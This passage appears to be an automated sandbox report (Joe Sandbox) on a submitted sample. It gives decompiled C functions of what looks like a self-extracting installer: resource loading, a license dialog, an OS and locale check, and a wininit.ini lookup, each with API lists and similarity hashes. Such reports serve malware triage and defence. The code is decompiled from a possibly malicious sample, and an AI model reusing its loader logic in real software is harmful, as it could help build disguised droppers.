• GetWindowRect.USER32(?,?), ref: 00A943F1
• GetWindowRect.USER32(00000000,?), ref: 00A9440B
• GetDC.USER32(?), ref: 00A94423
• GetDeviceCaps.GDI32(00000000,00000008), ref: 00A9442E
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A9443A
• ReleaseDC.USER32(?,00000000), ref: 00A94447
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A944A2

Memory Dump Source
• Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd

Similarity
• API ID: Window$CapsDeviceRect$Release
• String ID:
• API String ID: 2212493051-0
• Opcode ID: 7ac51760e8850dab26da5f9eb87d97199d6e1bf10a77b960d89173f22362a43f
• Instruction ID: 59f9e04058dd83d851518cf3fad4023b0ebe8494be27bdc0b04e7e811fdae6d4
• Opcode Fuzzy Hash: 7ac51760e8850dab26da5f9eb87d97199d6e1bf10a77b960d89173f22362a43f
• Instruction Fuzzy Hash: C931FD72B00119ABCF14CFF8DD49DAEBBB5EB89310F15426AE805B7250DA706D068BA1

Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 53%
                                                                                                                                                                                                        			E00A96298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				struct HRSRC__* _t21;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				struct HINSTANCE__* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                        				_t46 = 0;
                                                                                                                                                                                                        				_v32 = __ecx;
                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                        				_t36 = 1;
                                                                                                                                                                                                        				E00A9171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t51 = _t51 + 0x10;
                                                                                                                                                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                                        						 *0xa99124 = 0x80070714;
                                                                                                                                                                                                        						_t36 = _t46;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                        						_t44 = _t5;
                                                                                                                                                                                                        						_t40 = _t44;
                                                                                                                                                                                                        						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                        						_t47 = _t6;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t26 =  *_t40;
                                                                                                                                                                                                        							_t40 = _t40 + 1;
                                                                                                                                                                                                        						} while (_t26 != 0);
                                                                                                                                                                                                        						_t41 = _t40 - _t47;
                                                                                                                                                                                                        						_t46 = _t51;
                                                                                                                                                                                                        						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                        						 *0xa9a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                        						_t30 = _v32();
                                                                                                                                                                                                        						if(_t51 != _t51) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(_t45);
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							_t36 = 0;
                                                                                                                                                                                                        							FreeResource(??);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							FreeResource();
                                                                                                                                                                                                        							_v36 = _v36 + 1;
                                                                                                                                                                                                        							E00A9171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                        							_t46 = 0;
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					return E00A96CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        0x00a96308
                                                                                                                                                                                                        0x00a9630d
                                                                                                                                                                                                        0x00a96314
                                                                                                                                                                                                        0x00a96314
                                                                                                                                                                                                        0x00a96316
                                                                                                                                                                                                        0x00a96319
                                                                                                                                                                                                        0x00a96355
                                                                                                                                                                                                        0x00a96357
                                                                                                                                                                                                        0x00a9631b
                                                                                                                                                                                                        0x00a9631b
                                                                                                                                                                                                        0x00a96331
                                                                                                                                                                                                        0x00a96334
                                                                                                                                                                                                        0x00a96339
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96339
                                                                                                                                                                                                        0x00a96319
                                                                                                                                                                                                        0x00a9636b
                                                                                                                                                                                                        0x00a9637d
                                                                                                                                                                                                        0x00a9637d
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9171E: _vsnprintf.MSVCRT ref: 00A91750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A962CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A962D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A9631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A96345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A96357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: ee5a81924b581b5bbcbbf001d3dbac559f4bf7d7419236a9dc5013a16f015b20
                                                                                                                                                                                                        • Instruction ID: 68fd33d2768a97667c23c2560d60545a4170604dfd600887d50fa6f1f0419a1b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee5a81924b581b5bbcbbf001d3dbac559f4bf7d7419236a9dc5013a16f015b20
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E521D675B00219ABDF10DFA49C459FF7BB8FF48714B10421AF902A7241DB359D068BE1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00A9681F(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                        				void* _v172;
                                                                                                                                                                                                        				int* _v176;
                                                                                                                                                                                                        				int _v180;
                                                                                                                                                                                                        				int _v184;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t31;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t36 = __ebx;
                                                                                                                                                                                                        				_t19 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                        				_t41 =  *0xa981d8; // 0x0
                                                                                                                                                                                                        				_t43 = 0;
                                                                                                                                                                                                        				_v180 = 0xc;
                                                                                                                                                                                                        				_v176 = 0;
                                                                                                                                                                                                        				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                        					 *0xa981d8 = 0;
                                                                                                                                                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        						_t41 =  *0xa981d8; // 0x0
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t41 = 1;
                                                                                                                                                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t31 = RegQueryValueExA(_v172, 0xa91140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                        							_t43 = _t31;
                                                                                                                                                                                                        							RegCloseKey(_v172);
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t40 =  &_v176;
                                                                                                                                                                                                        								if(E00A966F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                        										 *0xa981d8 = _t41;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L12;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A96CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00a9690a
                                                                                                                                                                                                        0x00a96885
                                                                                                                                                                                                        0x00a96876
                                                                                                                                                                                                        0x00a96951

APIs
• GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A9686E
• GetSystemMetrics.USER32(0000004A), ref: 00A968A7
• RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A968CC
• RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,?,0000000C), ref: 00A968F4
• RegCloseKey.ADVAPI32(?), ref: 00A96902
  • Part of subcall function 00A966F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A9691A), ref: 00A96741
Strings
• Control Panel\Desktop\ResourceLocale, xrefs: 00A968C2
Memory Dump Source
• Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
Similarity
• API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
• String ID: Control Panel\Desktop\ResourceLocale
• API String ID: 3346862599-1109908249
• Opcode ID: 394f5b5b3d6bf70c7fae195a11315303d4fee2daabbb5c9c992bbd3717dedee9
• Instruction ID: f31bc48d3086a8524752c9bac01b5c9b7f8d7cc2cbc704b9ac50040698d54771
• Opcode Fuzzy Hash: 394f5b5b3d6bf70c7fae195a11315303d4fee2daabbb5c9c992bbd3717dedee9
• Instruction Fuzzy Hash: C7314F31B002289FDF21CB55CC45FAAB7F8EF46764F1001A7E949A6250DF319E86CB92
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00A93A3F(void* __eflags) {
	void* _t3;
	void* _t9;
	CHAR* _t16;

	_t16 = "LICENSE";
	_t1 = E00A9468F(_t16, 0, 0) + 1; // 0x1
	_t3 = LocalAlloc(0x40, _t1);
	*0xa98d4c = _t3;
	if(_t3 != 0) {
		_t19 = _t16;
		if(E00A9468F(_t16, _t3, _t28) != 0) {
			if(lstrcmpA( *0xa98d4c, "<None>") == 0) {
				LocalFree( *0xa98d4c);
				L9:
				*0xa99124 = 0;
				return 1;
			}
			_t9 = E00A96517(_t19, 0x7d1, 0, E00A93100, 0, 0);
			LocalFree( *0xa98d4c);
			if(_t9 != 0) {
				goto L9;
			}
			*0xa99124 = 0x800704c7;
			L2:
			return 0;
		}
		E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
		LocalFree( *0xa98d4c);
		*0xa99124 = 0x80070714;
		goto L2;
	}
	E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
	*0xa99124 = E00A96285();
	goto L2;
}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                          • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A92F64,?,00000002,00000000), ref: 00A93A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A93AB3
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                          • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A93AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 00A93B13
                                                                                                                                                                                                          • Part of subcall function 00A96517: FindResourceA.KERNEL32(00A90000,000007D6,00000005), ref: 00A9652A
                                                                                                                                                                                                          • Part of subcall function 00A96517: LoadResource.KERNEL32(00A90000,00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A96538
                                                                                                                                                                                                          • Part of subcall function 00A96517: DialogBoxIndirectParamA.USER32(00A90000,00000000,00000547,00A919E0,00000000), ref: 00A96557
                                                                                                                                                                                                          • Part of subcall function 00A96517: FreeResource.KERNEL32(00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A96560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00A93100,00000000,00000000), ref: 00A93AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: 1aacf7d80322dd905b411099c421db7e7fa6dba2109bcfac5c14db05e56fd048
                                                                                                                                                                                                        • Instruction ID: 98318f727bb73aafedb58aeede02570f0399a171cc3d43f1c67c1eca53528564
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1aacf7d80322dd905b411099c421db7e7fa6dba2109bcfac5c14db05e56fd048
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E1187713002017BDF20EBB69D09E1B39F9EBD9B40B10452FB545D95E1DE7D88028664
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00A924E0(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t7;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				long _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = __ebx;
                                                                                                                                                                                                        				_t7 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                        				_t25 = 0x104;
                                                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					E00A9658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                        					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                        						_lclose(_t25);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A96CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A92506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A9252C
                                                                                                                                                                                                        • _lopen.KERNEL32 ref: 00A9253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A9254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 00A92555
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: f274ff481c6bee733d8d05c8a2082352ddf8c4704a90475eaffe8349a4bdad96
                                                                                                                                                                                                        • Instruction ID: 357c63d99e9016ce82ebfe238483f70368993fbcd5c6f908e5f4cfa7ded4f3b6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f274ff481c6bee733d8d05c8a2082352ddf8c4704a90475eaffe8349a4bdad96
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C01523670011867CB20EBA59D09EDB7BBCEB95750F010166FA49D3190DE748E46CAD1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00A936EE(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                        				signed int _v420;
                                                                                                                                                                                                        				signed int _v424;
                                                                                                                                                                                                        				CHAR* _v428;
                                                                                                                                                                                                        				CHAR* _v432;
                                                                                                                                                                                                        				signed int _v436;
                                                                                                                                                                                                        				CHAR* _v440;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                        				CHAR* _t77;
                                                                                                                                                                                                        				CHAR* _t91;
                                                                                                                                                                                                        				CHAR* _t94;
                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                        				CHAR* _t98;
                                                                                                                                                                                                        				signed char _t99;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				signed short _t107;
                                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                                        				short _t113;
                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                        				signed char _t115;
                                                                                                                                                                                                        				short _t119;
                                                                                                                                                                                                        				CHAR* _t123;
                                                                                                                                                                                                        				CHAR* _t124;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				CHAR* _t138;
                                                                                                                                                                                                        				signed int _t139;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t72 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        				_t115 = __ecx;
                                                                                                                                                                                                        				_t135 = 0;
                                                                                                                                                                                                        				_v432 = __ecx;
                                                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                        					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                        					_t119 = 2;
                                                                                                                                                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                        					__eflags = _t77;
                                                                                                                                                                                                        					if(_t77 == 0) {
                                                                                                                                                                                                        						_t119 = 0;
                                                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                                                        						 *0xa98184 = 1;
                                                                                                                                                                                                        						 *0xa98180 = 1;
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						 *0xa99a40 = _t119;
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						__eflags =  *0xa98a34 - _t138; // 0x0
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                                                                        						if(_t115 == 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v428 = _t135;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                        						_t11 =  &_v420;
                                                                                                                                                                                                        						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                        						__eflags =  *_t11;
                                                                                                                                                                                                        						_v440 = _t115;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_v424 = _t135 * 0x18;
                                                                                                                                                                                                        							_v436 = E00A92A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                        							_t91 = E00A92A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                        							_t123 = _v436;
                                                                                                                                                                                                        							_t133 = 0x54d;
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 < 0) {
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								__eflags = _v420 - 1;
                                                                                                                                                                                                        								if(_v420 == 1) {
                                                                                                                                                                                                        									_t138 = 0x54c;
                                                                                                                                                                                                        									L36:
                                                                                                                                                                                                        									__eflags = _t138;
                                                                                                                                                                                                        									if(_t138 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										__eflags = _t138 - _t133;
                                                                                                                                                                                                        										if(_t138 == _t133) {
                                                                                                                                                                                                        											L30:
                                                                                                                                                                                                        											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                        											_t115 = 0;
                                                                                                                                                                                                        											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                        											__eflags = _t138 - _t133;
                                                                                                                                                                                                        											_t133 = _v432;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												_t124 = _v440;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                        												_v420 =  &_v268;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t124;
                                                                                                                                                                                                        											if(_t124 == 0) {
                                                                                                                                                                                                        												_t135 = _v436;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t99 = _t124[0x30];
                                                                                                                                                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                        												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                        													asm("sbb ebx, ebx");
                                                                                                                                                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t115 = 0x104;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xa98a38 & 0x00000001;
                                                                                                                                                                                                        											if(( *0xa98a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        												L64:
